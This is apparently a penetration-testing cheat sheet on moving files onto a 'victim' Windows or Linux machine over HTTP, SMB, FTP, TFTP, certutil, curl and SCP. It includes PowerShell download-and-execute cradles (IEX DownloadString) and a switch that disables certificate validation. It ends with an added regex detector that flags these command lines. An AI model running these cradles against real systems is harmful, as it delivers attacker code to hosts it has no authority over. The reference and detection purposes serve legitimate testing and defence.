Note
- Some operations may be blocked due to Windows Firewall policies.
- The default ports that the services below use might be blocked or filtered by IDS, firewall or policies.

Note
- Server: Basic commands to set up a running server.
- Target: These operations should be done on the victim machine.
- Interactive: We log into a remote machine via RDP, SSH etc.
- Non Interactive: Commands run in their own subshell and this shell is not interactive. It opens to execute, then closes immediately.

HTTP Server
:: Python[3]
python3 -m http.server <PORT>
:: Python[2]
python -m SimpleHTTPServer <PORT>
:: PHP
php -S 0.0.0.0:<PORT>
:: Ruby
ruby -run -ehttpd . -p<PORT>
:: Requires [http-server] NPM Package
:: Simple JavaScript HTTP Server
http-server [path] [options]

SMB
- SMB2 support and authentication (Username - Password) may be necessary due to Windows policies.
- Server
:: SMB2 support: [-smb2support]
:: Optional arguments: [-username] [-password]
smbserver -smb2support "SHARE_NAME" "DIRECTORY" -username "Username" -password "Password"
:: SMB Server without Authentication
smbserver -smb2support "SHARE_NAME" "DIRECTORY"
- Target
:: Mount the SMB Share with Username and Password
net use Z: \\<IP>\<SHARE_NAME> /user:<Username> <Password>
:: List SMB Share Contents
dir \\<IP>\<SHARE_NAME>
:: Download Files
copy \\<IP>\<SHARE_NAME>\"File Name" "Output"
copy Z:\"File Name" "Output"
:: Requires [PuTTY] to be Installed on Windows (pscp is PuTTY's SCP client, not SMB)
pscp <Username>@<IP>:"File Name" "Output"

FTP
- Server
:: Requires [pyftpdlib] Package
:: Start The Server (binding port 21 requires root privileges)
python3 -m pyftpdlib --port 21
- Target (Interactive Shell)
:: Access The Server
:: [USER: anonymous PASSWORD: anonymous]
:: [GET] - Download The File
ftp ➜ open <IP> ➜ anonymous / anonymous ➜ GET "File Name"
- Target (Non Interactive Shell)
:: Write the FTP commands to a script file, then run the client with [-s:]
echo open <IP> > FTP.txt
echo USER anonymous >> FTP.txt
echo anonymous >> FTP.txt
echo GET FILE.exe >> FTP.txt
echo bye >> FTP.txt
:: Download The File
ftp -v -n -s:FTP.txt
# PSH Download Method
(New-Object Net.WebClient).DownloadFile('ftp://<IP>/<File Name>', '<Output>')

TFTP
- Server
:: Requires [atftp] Package
:: Create TFTP Directory
mkdir /tftp
chown nobody: /tftp
:: Start The Server
atftpd --daemon --port 69 /tftp
- Target
:: Windows TFTP client in binary mode [-i]: PUT uploads, GET downloads
tftp -i <IP> PUT "File Name"
tftp -i <IP> GET "File Name"

PSH
Common Errors With PowerShell
- Error
There may be cases when the Internet Explorer first-launch configuration has not been completed, which prevents the download.
PS C:\> Invoke-WebRequest https://<IP>/<File Name> | IEX
Invoke-WebRequest : The response content cannot be parsed because the Internet Explorer engine is not available, or Internet Explorer's first-launch configuration is not complete. Specify the UseBasicParsing parameter and try again.
At line:1 char:1
+ Invoke-WebRequest https://<IP> ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotImplemented: (:) [Invoke-WebRequest], NotSupportedException
+ FullyQualifiedErrorId : WebCmdletIEDomNotSupportedException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand
- Bypass
# The [Error] can be Bypassed with [-UseBasicParsing]
Invoke-WebRequest https://<IP>/<File Name> -UseBasicParsing | IEX
- Error
This PowerShell error occurs when the SSL/TLS secure channel certificate is not trusted.
PS C:\> IEX(New-Object Net.WebClient).DownloadString('https://<IP>/<File Name>')
Exception calling "DownloadString" with "1" argument(s): "The underlying connection was closed: Could not establish trust relationship for the SSL/TLS secure channel."
At line:1 char:1
+ IEX(New-Object Net.WebClient).DownloadString('https://<IP>/ ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : WebException
- Bypass
# Disables certificate validation for every HTTPS connection in the current PowerShell process, not just this download
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}

Powershell Web Downloads Methods

| Method | Description |
|---|---|
| OpenRead | Returns the data from a resource as a Stream. |
| OpenReadAsync | Returns the data from a resource without blocking the calling thread. |
| DownloadData | Downloads data from a resource and returns a byte array. |
| DownloadDataAsync | Downloads data from a resource and returns a byte array without blocking the calling thread. |
| DownloadFile | Downloads data from a resource to a local file. |
| DownloadFileAsync | Downloads data from a resource to a local file without blocking the calling thread. |
| DownloadString | Downloads a string from a resource and returns a string. |
| DownloadStringAsync | Downloads a string from a resource without blocking the calling thread. |

- Interactive
# [DownloadFile] Method
# More Methods can be Found in the [Powershell Web Downloads Methods] table above
(New-Object Net.WebClient).DownloadFile('http://<IP>/<File Name>','<Output>')
# [IEX] - Invoke-Expression
# [DownloadString] - Fileless Method (Without Saving)
IEX (New-Object Net.WebClient).DownloadString('http://<IP>/<File Name>')
# IEX Accepts Pipeline Input
(New-Object Net.WebClient).DownloadString('http://<IP>/<File Name>') | IEX
Invoke-WebRequest http://<IP>/<File Name> -OutFile <Output>
Invoke-RestMethod http://<IP>/<File Name> -OutFile <Output>
- Non Interactive
:: Write the PowerShell script from cmd, then run it with a non-interactive powershell.exe
echo $storageDir = $pwd > PSH.ps1
echo $webclient = New-Object System.Net.WebClient >> PSH.ps1
echo $url = "http://<IP>/<File Name>" >> PSH.ps1
echo $file = "Output" >> PSH.ps1
echo $webclient.DownloadFile($url,$file) >> PSH.ps1
powershell -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File PSH.ps1

CERTUTIL
:: Save Remote File
certutil -urlcache -split -f "http://<IP>/<File Name>"
certutil -verifyctl -split -f "http://<IP>/<File Name>"
CURL - WGET
:: Save Remote File
curl "http://<IP>/<File Name>" -o <Output>
:: Save Remote File
wget "http://<IP>/<File Name>" -O <Output>
SCP
:: Copy Remote File to the Local System
scp -P 22 <Username>@<IP>:C:\"File Name" "Output"
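From the defender's side, every transfer command on this page (the PowerShell WebClient cradles and -UseBasicParsing bypass, the certificate validation callback, certutil -urlcache/-verifyctl, the scripted ftp -s: client and the Windows tftp -i client) leaves a recognisable process command line. The following detector is an added example, not part of the original notes: it matches those patterns against constructed Sysmon/4688-style command lines (192.0.2.10 is a documentation address, and the rule names are mine).

```python
import re

# Regexes over a process command line (e.g. Sysmon Event ID 1 or Security 4688)
# for the transfer commands listed on this page. (rule name, pattern); all case-insensitive.
RULES = [
    ("psh_webclient_cradle",
     re.compile(r"Net\.WebClient\)?\.Download(String|File|Data)\s*\(", re.I)),
    # IEX fed by DownloadString/DownloadData, or anything piped into IEX
    ("psh_iex_pipeline",
     re.compile(r"\b(IEX|Invoke-Expression)\b[^|]*\bDownload(String|Data)\b"
                r"|\|\s*(IEX|Invoke-Expression)\b", re.I)),
    ("psh_invoke_webrequest",
     re.compile(r"Invoke-(WebRequest|RestMethod)\b.*-(OutFile|UseBasicParsing)\b", re.I)),
    # certificate validation turned off for the whole process
    ("psh_cert_validation_disabled",
     re.compile(r"ServerCertificateValidationCallback\s*=\s*\{\s*\$true\s*\}", re.I)),
    ("certutil_urlcache",
     re.compile(r"certutil(\.exe)?\s.*-(urlcache|verifyctl)\s.*-split\s.*-f\s", re.I)),
    ("ftp_scripted",
     re.compile(r"\bftp(\.exe)?\s.*-s:", re.I)),
    ("tftp_transfer",
     re.compile(r"\btftp(\.exe)?\s+-i\s+\S+\s+(GET|PUT)\b", re.I)),
]


def match_rules(command_line):
    """Return the names of every rule whose pattern matches, in RULES order."""
    return [name for name, rx in RULES if rx.search(command_line)]


def scan(lines):
    """Map each command line that matched at least one rule to its rule names."""
    return {line: match_rules(line) for line in lines if match_rules(line)}


# Constructed sample command lines (192.0.2.10 is a documentation address, not a real host).
SAMPLE_LOG = [
    "powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.ps1')",
    "powershell.exe Invoke-WebRequest http://192.0.2.10/a.exe -OutFile C:\\Users\\Public\\a.exe",
    "certutil.exe -urlcache -split -f http://192.0.2.10/a.exe a.exe",
    "ftp.exe -v -n -s:FTP.txt",
    "tftp.exe -i 192.0.2.10 GET a.exe",
    "powershell.exe -c [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; "
    "IEX (New-Object Net.WebClient).DownloadString('https://192.0.2.10/a.ps1')",
    "powershell.exe Get-ChildItem C:\\Windows\\Temp",  # benign control line
]

if __name__ == "__main__":
    for line, names in scan(SAMPLE_LOG).items():
        print(", ".join(names), "<-", line)
```

The patterns key on the command line only, so the script-file variant (PSH.ps1 written with echo) shows up as powershell.exe -File rather than as a cradle; pair this with script block logging (Event ID 4104) to see the downloaded content itself.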